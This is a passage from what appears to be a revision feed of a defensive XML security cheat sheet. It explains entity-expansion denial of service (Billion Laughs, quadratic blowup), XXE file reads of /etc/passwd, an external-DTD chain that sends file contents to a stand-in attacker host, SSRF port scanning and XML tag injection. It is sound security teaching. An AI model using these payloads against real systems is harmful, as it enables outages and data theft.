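    return any(visit(name, set()) for name in references)


circular = has_circular_reference({"A": ["B"], "B": ["A"]})
nested = has_circular_reference({"LOL1": ["LOL"], "LOL": []})
print(circular, nested)  # True False
```

The first call models the two entities declared in the example and reports the loop. The second call models a nested but finite definition.&lt;br /&gt;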
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n^2)). The result of the following attack will be 100,000*100,000 (10^10) characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(100,000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(100,000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
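&lt;br /&gt;
The asymmetry between what the attacker sends and what the parser must hold can be estimated with simple arithmetic. The following Python sketch uses the figures from the example and ignores the small overhead of the surrounding markup. The variable names are chosen only for illustration:&lt;br /&gt;

```python
entity_length = 100_000    # characters in the replacement text of entity A
reference_count = 100_000  # number of references to A in the document body
reference_length = 3       # characters in one reference: ampersand, "A", semicolon

sent_characters = entity_length + reference_count * reference_length
expanded_characters = entity_length * reference_count

print(sent_characters)                         # 400000
print(expanded_characters)                     # 10000000000
print(expanded_characters // sent_characters)  # 25000
```

Under these assumptions, a document of roughly 400,000 characters expands to 10^10 characters, an amplification factor of about 25,000.&lt;br /&gt;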
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the nested entities included within the following code, the application will start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 references to &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt; in its definition; then each of these will be resolved as 10 references to &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt;, and so on. Finally, the CPU and/or memory will be affected by expanding 10^9 copies of the string &amp;lt;tt&amp;gt;LOL&amp;lt;/tt&amp;gt;, about 3*10^9 (3,000,000,000) characters, which could make the parser crash.&lt;br /&gt;
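&lt;br /&gt;
The size of the fully expanded entity follows from repeated multiplication. The Python sketch below reproduces that calculation for the DTD shown earlier: a base string of three characters, nine levels of nesting, and ten references per level. The function name and parameter names are hypothetical:&lt;br /&gt;

```python
def expanded_length(base_length, fan_out, levels):
    """Return the number of characters produced by expanding the top-level entity."""
    length = base_length
    for _ in range(levels):
        length *= fan_out  # each level repeats the previous one fan_out times
    return length


total = expanded_length(base_length=3, fan_out=10, levels=9)
print(total)  # 3000000000
```

Adding one more level to the DTD would multiply the result by ten again, while adding only one line to the document.&lt;br /&gt;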
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE soap:Envelope [ &lt;br /&gt;
  &amp;lt;!ELEMENT soap:Envelope ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST soap:Envelope entityReference CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt; &lt;br /&gt;
&amp;lt;soap:Envelope entityReference=&amp;quot;&amp;amp;LOL9;&amp;quot; xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;soap:Body&amp;gt; &lt;br /&gt;
    &amp;lt;keyword xmlns=&amp;quot;urn:parasoft:ws:store&amp;quot;&amp;gt;foo&amp;lt;/keyword&amp;gt;&lt;br /&gt;
  &amp;lt;/soap:Body&amp;gt;&lt;br /&gt;
&amp;lt;/soap:Envelope&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;xxe;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt;, whose value is the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt; and which will be expanded within the &amp;lt;tt&amp;gt;root&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF) happens when the server receives a malicious XML schema that makes the server retrieve resources such as a local file or a file reachable over HTTP, HTTPS, or FTP. SSRF has been used to retrieve remote files, to prove an XXE when the file cannot be reflected back, to perform port scanning, and to perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY % xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt; &lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allow for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt;, which loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt;, which loads a remote DTD. The remote DTD should contain something like this:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
This is the simplest and most unusual scenario. With complete disclosure, you can clearly see what is going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports, depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the response time when connecting to a valid port will be very quick (one second, for example). The difference between open and closed ports becomes quite clear.&lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes the differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host, and then analyze the average time for each port to determine its status. This type of attack will be difficult to accomplish in higher latency networks.&lt;br /&gt;
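&lt;br /&gt;
The averaging step can be sketched in a few lines of Python. The measurements below are made-up values used only to exercise the functions, and the function names are hypothetical. Whether the slower group corresponds to open or closed ports depends on the implementation under test, so the sketch only ranks the ports:&lt;br /&gt;

```python
from statistics import mean


def average_times(samples_by_port):
    """Return the mean response time in seconds for each port."""
    return {port: mean(samples) for port, samples in samples_by_port.items()}


def slowest_first(averages):
    """Order ports from the slowest to the fastest average response."""
    return sorted(averages, key=averages.get, reverse=True)


# Made-up measurements in seconds, several samples per port.
measurements = {
    80: [0.21, 0.19, 0.20],
    81: [0.32, 0.30, 0.31],
}
averages = average_times(measurements)
print(slowest_first(averages))  # [81, 80]
```

Taking more samples per port reduces the influence of network jitter on each average.&lt;br /&gt;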
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
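&lt;br /&gt;
To see which parts of such a URI carry the credentials, the example can be split with the Python standard library. This is only an illustration of the URI layout, and &amp;lt;tt&amp;gt;foo&amp;lt;/tt&amp;gt; stands in for whatever scheme the target parser accepts:&lt;br /&gt;

```python
from urllib.parse import urlsplit

# Example URI taken from the text above.
parts = urlsplit("foo://username:password@example.com:8080/")

print(parts.username)  # username
print(parts.password)  # password
print(parts.hostname)  # example.com
print(parts.port)      # 8080
```

The credentials travel in the part of the URI that precedes the host, so every guess only changes that component.&lt;br /&gt;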
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224427</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224427"/>
				<updated>2016-12-21T20:14:18Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using documents that are not well formed.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution upon detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though it is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coercive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up, and eventually deplete, the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closes the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and sets the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10. If the application processes only the first values provided for the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
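&lt;br /&gt;
The effect of reading only the first matching value can be reproduced with a short Python sketch. It builds in memory the tree that a parser would produce for the tampered document, then compares a naive lookup with a structural check. The helper names are hypothetical, and the structural check is a stand-in for proper schema validation:&lt;br /&gt;

```python
import xml.etree.ElementTree as ET


def build_buy(children):
    """Build a buy element from (tag, text) pairs, in document order."""
    buy = ET.Element("buy")
    for tag, text in children:
        ET.SubElement(buy, tag).text = text
    return buy


def has_expected_structure(buy):
    """Accept only exactly one id followed by exactly one price."""
    return [child.tag for child in buy] == ["id", "price"]


# Tree that a parser would produce for the tampered document.
tampered = build_buy([("id", "123"), ("price", "0"), ("id", ""), ("price", "10")])

print(tampered.find("price").text)       # 0
print(has_expected_structure(tampered))  # False
```

The naive lookup returns the injected price, while the structural check rejects the document before any value is read.&lt;br /&gt;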
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1,000,000 digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. Both &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; are defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; element contains an irrelevant value, but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size of the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server. Typically this type of element should be restricted to a maximum number of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - 